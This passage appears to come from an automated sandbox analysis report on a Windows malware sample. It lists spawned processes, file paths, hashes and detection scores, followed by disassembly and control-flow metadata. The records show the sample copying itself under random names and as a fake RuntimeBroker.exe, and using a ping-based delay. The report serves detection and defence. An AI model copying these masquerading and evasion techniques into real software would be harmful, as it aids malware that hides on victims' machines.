                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:35
                                                                                                                                    Start time:13:42:02
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:chcp 65001
                                                                                                                                    Imagebase:0x7ff644fc0000
                                                                                                                                    File size:14'848 bytes
                                                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:36
                                                                                                                                    Start time:13:42:02
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:ping -n 10 localhost
                                                                                                                                    Imagebase:0x7ff7b9570000
                                                                                                                                    File size:22'528 bytes
                                                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:37
                                                                                                                                    Start time:13:42:06
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                                    File size:496'640 bytes
                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:38
                                                                                                                                    Start time:13:42:08
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0x730000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:40
                                                                                                                                    Start time:13:42:13
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0x960000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:41
                                                                                                                                    Start time:13:42:19
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                                                                    Imagebase:0x6b0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:44
                                                                                                                                    Start time:13:42:27
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0xfe0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:47
                                                                                                                                    Start time:13:42:30
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0x7ff7a5cb0000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:48
                                                                                                                                    Start time:13:42:30
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:49
                                                                                                                                    Start time:13:42:30
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Imagebase:0x570000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:51
                                                                                                                                    Start time:13:42:33
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                    File size:55'320 bytes
                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    General

                                                                                                                                    Target ID:52
                                                                                                                                    Start time:13:42:37
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                                                                    Imagebase:0x5b0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:54
                                                                                                                                    Start time:13:42:45
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0xe00000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:55
                                                                                                                                    Start time:13:42:54
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                                                                    Imagebase:0xa50000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:5.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:9
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 14556 7ffd9bc52a4d 14557 7ffd9bc52a5f GetFileAttributesW 14556->14557 14559 7ffd9bc52b25 14557->14559 14564 7ffd9bc51779 14565 7ffd9bc51787 FindCloseChangeNotification 14564->14565 14567 7ffd9bc51864 14565->14567 14560 7ffd9bc5165c 14561 7ffd9bc5165f ResumeThread 14560->14561 14563 7ffd9bc51724 14561->14563

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00007FFD9BC61B7F Relevance: .7, Instructions: 702COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 163 7ffd9bc61b7f-7ffd9bc61b92 164 7ffd9bc61b94-7ffd9bc61ed5 163->164 165 7ffd9bc61bde-7ffd9bc61bf4 163->165 170 7ffd9bc61edf-7ffd9bc61f1e 164->170 167 7ffd9bc61c84-7ffd9bc61cb4 165->167 168 7ffd9bc61bfa-7ffd9bc61c02 165->168 179 7ffd9bc61d5e-7ffd9bc61d67 167->179 180 7ffd9bc61cba-7ffd9bc61cbb 167->180 168->170 171 7ffd9bc61c08-7ffd9bc61c1a 168->171 181 7ffd9bc61f20 170->181 171->170 172 7ffd9bc61c20-7ffd9bc61c37 171->172 175 7ffd9bc61c39-7ffd9bc61c40 172->175 176 7ffd9bc61c77-7ffd9bc61c7e 172->176 175->170 177 7ffd9bc61c46-7ffd9bc61c74 175->177 176->167 176->168 177->176 183 7ffd9bc61d6d-7ffd9bc61d73 179->183 184 7ffd9bc61e9f-7ffd9bc61ea6 179->184 182 7ffd9bc61cbe-7ffd9bc61cd4 180->182 189 7ffd9bc61f2b-7ffd9bc61fc1 181->189 182->170 186 7ffd9bc61cda-7ffd9bc61cfe 182->186 183->170 185 7ffd9bc61d79-7ffd9bc61d88 183->185 187 7ffd9bc61e92-7ffd9bc61e99 185->187 188 7ffd9bc61d8e-7ffd9bc61d95 185->188 190 7ffd9bc61d51-7ffd9bc61d58 186->190 191 7ffd9bc61d00-7ffd9bc61d23 call 7ffd9bc54778 186->191 187->183 187->184 188->170 192 7ffd9bc61d9b-7ffd9bc61da7 call 7ffd9bc54778 188->192 199 7ffd9bc61fcc-7ffd9bc6200f 189->199 200 7ffd9bc61f46-7ffd9bc61fc6 189->200 190->179 190->182 191->170 201 7ffd9bc61d29-7ffd9bc61d4f 191->201 198 7ffd9bc61dac-7ffd9bc61db7 192->198 202 7ffd9bc61db9-7ffd9bc61dd0 198->202 203 7ffd9bc61df6-7ffd9bc61e05 198->203 216 7ffd9bc62011-7ffd9bc62066 199->216 200->199 211 7ffd9bc61f68-7ffd9bc61fc8 200->211 201->190 201->191 202->170 205 7ffd9bc61dd6-7ffd9bc61df2 202->205 203->170 206 7ffd9bc61e0b-7ffd9bc61e2f 203->206 205->202 209 7ffd9bc61df4 205->209 210 7ffd9bc61e32-7ffd9bc61e4f 206->210 213 7ffd9bc61e72-7ffd9bc61e88 209->213 210->170 214 7ffd9bc61e55-7ffd9bc61e70 210->214 211->199 220 7ffd9bc61f8c-7ffd9bc61fca 211->220 213->170 218 7ffd9bc61e8a-7ffd9bc61e8e 213->218 214->210 214->213 227 7ffd9bc62071-7ffd9bc62117 216->227 218->187 220->199 225 7ffd9bc61fad-7ffd9bc61fc0 220->225 239 7ffd9bc6211d-7ffd9bc624c0 227->239 240 7ffd9bc62247-7ffd9bc62264 227->240 247 7ffd9bc6252e-7ffd9bc62548 239->247 242 7ffd9bc62571-7ffd9bc625b6 240->242 243 7ffd9bc6226a-7ffd9bc6226f 240->243 244 7ffd9bc62272-7ffd9bc62279 243->244 245 7ffd9bc621fc-7ffd9bc62569 244->245 246 7ffd9bc6227b-7ffd9bc6227f 244->246 245->242 246->216 249 7ffd9bc62285 246->249 252 7ffd9bc62303-7ffd9bc62306 249->252 253 7ffd9bc62309-7ffd9bc62310 252->253 254 7ffd9bc62316 253->254 255 7ffd9bc62287-7ffd9bc622bc call 7ffd9bc61f10 253->255 257 7ffd9bc62386-7ffd9bc6238d 254->257 255->242 262 7ffd9bc622c2-7ffd9bc622d2 255->262 258 7ffd9bc6238f-7ffd9bc623d5 257->258 259 7ffd9bc62318-7ffd9bc6234a call 7ffd9bc61f10 257->259 274 7ffd9bc621a4-7ffd9bc621a8 258->274 275 7ffd9bc623db-7ffd9bc623e0 258->275 259->242 268 7ffd9bc62350-7ffd9bc62378 259->268 262->216 264 7ffd9bc622d8-7ffd9bc622f5 262->264 264->242 267 7ffd9bc622fb-7ffd9bc62300 264->267 267->252 268->242 269 7ffd9bc6237e-7ffd9bc62383 268->269 269->257 276 7ffd9bc621fa 274->276 277 7ffd9bc621aa-7ffd9bc621c7 274->277 278 7ffd9bc62466-7ffd9bc6246a 275->278 276->244 277->247 279 7ffd9bc62470-7ffd9bc62476 278->279 280 7ffd9bc623e5-7ffd9bc62414 call 7ffd9bc61f10 278->280 280->242 283 7ffd9bc6241a-7ffd9bc6242a 280->283 283->227 284 7ffd9bc62430-7ffd9bc6243f 283->284 284->242 285 7ffd9bc62445-7ffd9bc62458 284->285 285->253 286 7ffd9bc6245e-7ffd9bc62463 285->286 286->278
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f40a86c21ca517f7367ef8408bb9cecc3a6a5ce5ff043324dceaf4ac9d4a076b
                                                                                                                                      • Instruction ID: a84b8ade305443e30f68071f8b6f95c0f690a232c2b2f2aaea4b81e229397a31
                                                                                                                                      • Opcode Fuzzy Hash: f40a86c21ca517f7367ef8408bb9cecc3a6a5ce5ff043324dceaf4ac9d4a076b
                                                                                                                                      • Instruction Fuzzy Hash: 41429330A1964A8FDB6DCFA8C4A4ABC77B1FF54301F5041BDD45ACB296DB38A981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890DA8 Relevance: .3, Instructions: 286COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 774 7ffd9b890da8-7ffd9b890dc3 775 7ffd9b890dc5 774->775 776 7ffd9b890dc6-7ffd9b890e09 774->776 775->776 778 7ffd9b890e0b 776->778 779 7ffd9b890e10-7ffd9b890f39 call 7ffd9b8907f8 776->779 778->779 798 7ffd9b890f3b-7ffd9b890f47 779->798 799 7ffd9b890f51 779->799 803 7ffd9b890f4e-7ffd9b890f50 798->803 800 7ffd9b890f89-7ffd9b890ff3 799->800 801 7ffd9b890f53 799->801 811 7ffd9b890ffb-7ffd9b8910ec 800->811 801->803 804 7ffd9b890f55-7ffd9b890f88 801->804 803->799 804->800
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 908605d3329978bedd785ee36c114ca1180c5dbc75e3ed3a51d253e06e013d84
                                                                                                                                      • Instruction ID: c8be6486eccbbabf4b95010a28abbb1fd46e1eb06e0a7d3fa6dad123eca9d192
                                                                                                                                      • Opcode Fuzzy Hash: 908605d3329978bedd785ee36c114ca1180c5dbc75e3ed3a51d253e06e013d84
                                                                                                                                      • Instruction Fuzzy Hash: C5A1BF71A19A4D8FEB98DF68C8647A9BFE1FFA9710F40017AE049D32EADB7418018741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9BC51779 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                      • Opcode ID: b1fc31bcee8ca690b411f8f111eeba0e10c8c72a5412d5d68ab867dbca95dfff
                                                                                                                                      • Instruction ID: 7bd776811b120d037b9e27a75bd6b50fec1cf36987301bb8a5c7ac4a4732f14f
                                                                                                                                      • Opcode Fuzzy Hash: b1fc31bcee8ca690b411f8f111eeba0e10c8c72a5412d5d68ab867dbca95dfff
                                                                                                                                      • Instruction Fuzzy Hash: EB414C70E0864C8FDB59DFA8D899BEDBBF0EF56310F1041AAD049D7292DA74A885CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9BC52A4D Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 111 7ffd9bc52a4d-7ffd9bc52b23 GetFileAttributesW 115 7ffd9bc52b2b-7ffd9bc52b69 111->115 116 7ffd9bc52b25 111->116 116->115
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: e65c7a5157dc184f2695a18de9cab87971b055ad8ff66c4b898f6f05e62a991d
                                                                                                                                      • Instruction ID: 132b99a0dd544fcd829e3eaa6cc30611e8184272948e2ce27ea5a5b2eac50cb0
                                                                                                                                      • Opcode Fuzzy Hash: e65c7a5157dc184f2695a18de9cab87971b055ad8ff66c4b898f6f05e62a991d
                                                                                                                                      • Instruction Fuzzy Hash: 7C410A70E0864C8FDB98DF98D895BEDBBF0FB5A310F10416ED049E7252DA719886CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9BC5165C Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 103 7ffd9bc5165c-7ffd9bc51722 ResumeThread 107 7ffd9bc51724 103->107 108 7ffd9bc5172a-7ffd9bc51774 103->108 107->108
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ResumeThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                      • Opcode ID: e07eb92ccde1c8dfefabc9b41233886b31240c17ab568f568196ef6c2d9ad8f6
                                                                                                                                      • Instruction ID: f08c30e06adf41d16c537313f9d2d7d8144b2e0cfe0ad8cce46266210f6f6cff
                                                                                                                                      • Opcode Fuzzy Hash: e07eb92ccde1c8dfefabc9b41233886b31240c17ab568f568196ef6c2d9ad8f6
                                                                                                                                      • Instruction Fuzzy Hash: 5841E974E08A1C8FDB98DFA8D899AEDBBF0FB59310F10416AD449E7251DA71A846CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8906CD Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 150 7ffd9b8906cd-7ffd9b8906ee 152 7ffd9b890708-7ffd9b8a0c65 150->152 153 7ffd9b8906f0-7ffd9b8a088f 150->153 158 7ffd9b8a0c67 152->158 159 7ffd9b8a0c6c-7ffd9b8a0c83 152->159 156 7ffd9b8a0896-7ffd9b8a089f call 7ffd9b890960 153->156 157 7ffd9b8a0891 153->157 161 7ffd9b8a08a4-7ffd9b8a08b1 156->161 157->156 158->159
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =N_^
                                                                                                                                      • API String ID: 0-3908133570
                                                                                                                                      • Opcode ID: 2bf21e089455a04f6de13e0fe4032bc67fd32884da049a587191901c341bc138
                                                                                                                                      • Instruction ID: c6ec6d807143af99403180534c359a242034746a7b73b4e1c8bf35619b3cbb14
                                                                                                                                      • Opcode Fuzzy Hash: 2bf21e089455a04f6de13e0fe4032bc67fd32884da049a587191901c341bc138
                                                                                                                                      • Instruction Fuzzy Hash: 87F05430A15A4D9FEF91EF98D8546FEBBE0FF58710F110576E41CD21A4DA34A6A0CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8909B8 Relevance: .2, Instructions: 177COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e989e6e5527cd9e4b1d7da4b57e3ff7f5857a1f0593f71c5d576a220e5fb754a
                                                                                                                                      • Instruction ID: 499c4bffffc92e94aed49405d97fae3ac7a504751cd14f13a14e55ccf81ab378
                                                                                                                                      • Opcode Fuzzy Hash: e989e6e5527cd9e4b1d7da4b57e3ff7f5857a1f0593f71c5d576a220e5fb754a
                                                                                                                                      • Instruction Fuzzy Hash: 4D51F462B0853ACAE71E77FCB9259ED6B80DF4432CB0842B7E05DCA0D7DD58648293D5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8986A0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d3b463dd656f1c910e47943c4618cad02a3798ae84175e285bb5cd2bf6c3de8b
                                                                                                                                      • Instruction ID: 5b6776070c271b95d795d28c2bfa811eb992609a7e200e140a1603e60e635081
                                                                                                                                      • Opcode Fuzzy Hash: d3b463dd656f1c910e47943c4618cad02a3798ae84175e285bb5cd2bf6c3de8b
                                                                                                                                      • Instruction Fuzzy Hash: 5A51D671A1995D8FEFA0EB18C894AE9B7B1FB59341F4001EAA14DE3261DA746AC5CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B890908 Relevance: .1, Instructions: 133COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07fbee1c3d63d78115a5db4ddb5bda7bd54d789bf29145f7abb399fa03b5b8c4
                                                                                                                                      • Instruction ID: e4f9f4774999c202ee0df8f41a41f5f7704890899b32dc08f3200836d710f7e4
                                                                                                                                      • Opcode Fuzzy Hash: 07fbee1c3d63d78115a5db4ddb5bda7bd54d789bf29145f7abb399fa03b5b8c4
                                                                                                                                      • Instruction Fuzzy Hash: 4F517A34A0490E9FCF94EF98D894EEDBBF1FF58315B050169E419E7260DA34E990CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8909A0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fa5ca149398a54ba528d666e65ec9f84cc7fada8b73f768fb17daacc5f821083
                                                                                                                                      • Instruction ID: 28cc4f9d8e495b7f60956cdbb5ce5e8c4c1476176ee8149459e486c027fe42ac
                                                                                                                                      • Opcode Fuzzy Hash: fa5ca149398a54ba528d666e65ec9f84cc7fada8b73f768fb17daacc5f821083
                                                                                                                                      • Instruction Fuzzy Hash: F2410670A18A5D8FDF98EF98C895AEDBBF1FF58305F10017AE41DE3295DA34A8418B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8989DC Relevance: .1, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a6664421b6a48d8d84025898304878ffcb0d47582e1ad8af7b763e81078861ed
